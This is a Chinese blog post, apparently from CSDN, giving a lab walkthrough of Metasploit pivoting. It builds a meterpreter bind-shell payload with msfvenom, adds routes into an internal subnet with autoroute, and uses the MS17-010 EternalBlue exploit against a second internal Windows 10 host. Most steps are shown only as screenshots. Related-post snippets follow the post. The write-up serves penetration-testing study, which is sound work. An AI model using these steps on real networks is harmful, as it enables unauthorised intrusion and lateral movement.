MSF路由模块-内网跳跃

已于 2023-12-10 15:09:27 修改
阅读量172 收藏
点赞数
分类专栏: 内网安全 文章标签: 内网安全
于 2023-11-13 20:17:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46411728/article/details/134273179
版权

实验目的:
1、先获取内网win10主机1的shell
2、meterpreter会话中添加内网路由地址
3、利用永恒之蓝漏洞获取内网win10主机2的shell
跳板实现过程
(1)需要有一个已经获取的meterpreter会话;
(2)获取内网地址网段
(3)在MSF平台上添加去往内网网段的路由

一、网络拓扑

在这里插入图片描述
其中
1:内网win10主机1IP:192.168.26.200
2:外网路由器IP:10.23.40.1(10.23.40.200可访问内网win10主机1)
3:kali攻击机IP:192.168.77.128
4、内网win10主机2IP:10.100.10.100

二、利用3389端口,远程连接内网win10主机1(10.23.40.200)
在这里插入图片描述

三,利用kali生成木马
命令:msfvenom -a x64 -p windows/x64/meterpreter/bind_tcp lport=4444 -f exe -o msf1.exe
在这里插入图片描述

四、设置监听payload在这里插入图片描述

在这里插入图片描述

五、获取内网win10主机1的shell
在这里插入图片描述

六、添加路由
获取目标内网相关信息,命令:run get_local_subnets
配置静态路由,命令:run autoroute -s 10.100.10.100/24
查看路由表,命令:run autoroute -p
在这里插入图片描述

七、添加成功,退出meterpreter会话
在这里插入图片描述

八、利用ms17_010获取内网win10主机2的权限
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

九、成功获取内网win10主机2的shell
在这里插入图片描述

学安全的废物
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf-with-rubymine:如何使用Ruby开发metasploit模块
04-10
msf-with-rubymine 如何在RubyMine中使用metasploit1.设置您的开发环境在第一步中安装软件包: : 2.在〜/ .msf4中添加一个Gemfile: # ~/.msf4/Gemfilesource 'https://rubygems.org'gem 'metasploit-framework', ...
内网安全:代理技术详解
qq_61553520的博客
06-03 8999
本篇将介绍在内网攻防中经常用到的代理技术,正向连接,反向连接。
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 1941
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 6809
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
msf路由
qq_41741127的博客
10-05 3691
metasploit设置路由转发 0. 试验环境 环境部署在VMWare下,共三台主机,两个网段。 Host-only(192.168.2.0):Kali(攻击机:192.168.2.129)Win7(靶机:192.168.2.128) NAT(192.168.32.0):Win7(靶机:192.168.32.151)OWASP Linux(靶机:192.168.32.150) 即:一台单网卡Kali,一台双网卡Win7,一台单网卡Linux,Win7与其余两台主机可以通信,其余两台主机之间不能互相通信。H
msf添加路由及socks5代理
越努力 越自由
05-07 8723
msf 添加路由 socks代理 nmap在挂上socks代理时进行扫描 -sT -Pn
内网安全--隧道技术-MSF上线本地
金灰的博客
05-28 949
免责声明:本文仅做技术交流与学习...
路由代理(msf、CobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2580
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
php-msf源码详解
10-18
这种隔离有助于降低模块间的耦合度,使得单个模块的修改不会引起其他模块的连锁反应,从而提高系统的灵活性和可维护性。 在讨论协程相关知识时,文档中提到要弄清楚协程的“产生、调度和销毁”。在php-msf这样的...
内网MSF11111
01-05
内网渗透测试中,Metasploit(MSF)是一个常用的安全工具,用于模拟攻击和漏洞利用。本文将详细讲解如何在内网环境中配置MSF,包括PostgreSQL数据库的安装、管理以及MSF数据库的设置。 首先,安装PostgreSQL数据库...
myAuxiliary.rb:msf开发后辅助模块-开源
04-26
该辅助模块需要安装[metasploit]框架。此模块是metasploit开发后(在利用目标之后)辅助脚本,因此我们需要首先利用目标才能使用它。 受影响的平台:Windows OS(高于Windows Vista的所有版本)请阅读我的WIKI以获取...
MSF路由转发
baidu_38844729的博客
11-29 955
前言 已经拿下一台内网服务器的控制权,想要用msf去访问内网资源,可以在msf中添加路由 msf访问内网实现的条件: 1.获得一个msf的session会话 2.在msf中添加内网网段的路由 步骤 1.msf反弹shell,获取session会话,具体过程可以参考:https://blog.csdn.net/baidu_38844729/article/details/109940441,我已经获得了会话, 2.添加路由 route add 0.0.0.0 0.0.0.0 session ID #分别为
MSF横向拓展(流量代理,端口代理转发)--详细教程
qq_41245301的博客
01-19 888
命令进行路由跟踪发现走了我的真实机的vmnet8网卡,我们在kail中把vmnet8的网卡的网关删除掉(需要连外网时记得添加回来route add default gw 192.168.138.2),再ping时发现已经网络不可达了,实验环境就可以了。原理:因为之前环境已经实现了通过msf可以访问到内网主机的功能,我们现在通过server/socks_proxy模块实现让指定的流量走msf创建的路由到达内网主机,实现代理。可以实现代理,我们可以发现当我们使用代理时是不能连接到内网主机的,当我们加上。
[内网渗透]—MSF使用
Sentiment的博客
12-08 465
(2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为payload.exe,保存在根目录下。这里其实有一个大问题,通过这种方式做代理转发,只能是msf使用,其它应用无法使用,如果想使用其他应用探测内网如nmap等工具?一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使用migrate进行。
metasploit使用及内网笔记
weixin_45653478的博客
03-31 685
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Shell中直接输入msfconsole。
内网渗透之MSF 路由转发
椰树ii
11-22 8712
    如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。     MSF跳板实现过程:            需要获得一个msf的session会话;            获取内网地址网段;            在msf中添加”内网网段“的路由;            获取内网网段地址:           例如:meterpre...
后渗透阶段之基于MSF路由转发
谢公子的博客
06-17 5823
目录 反弹MSF类型的Shell 添加内网路由 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由,直接使用MSF去访问原本不能直接访问的内网资源,只要路由可达了那么我们就可以使用MSF来进行探测了。 我们现在有下面这个环境: Web服务器通过端口映射,对外提供Web服务。Web服...
Django 安装包 linux
最新发布
09-05
Django 安装包 主要应用于linux
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值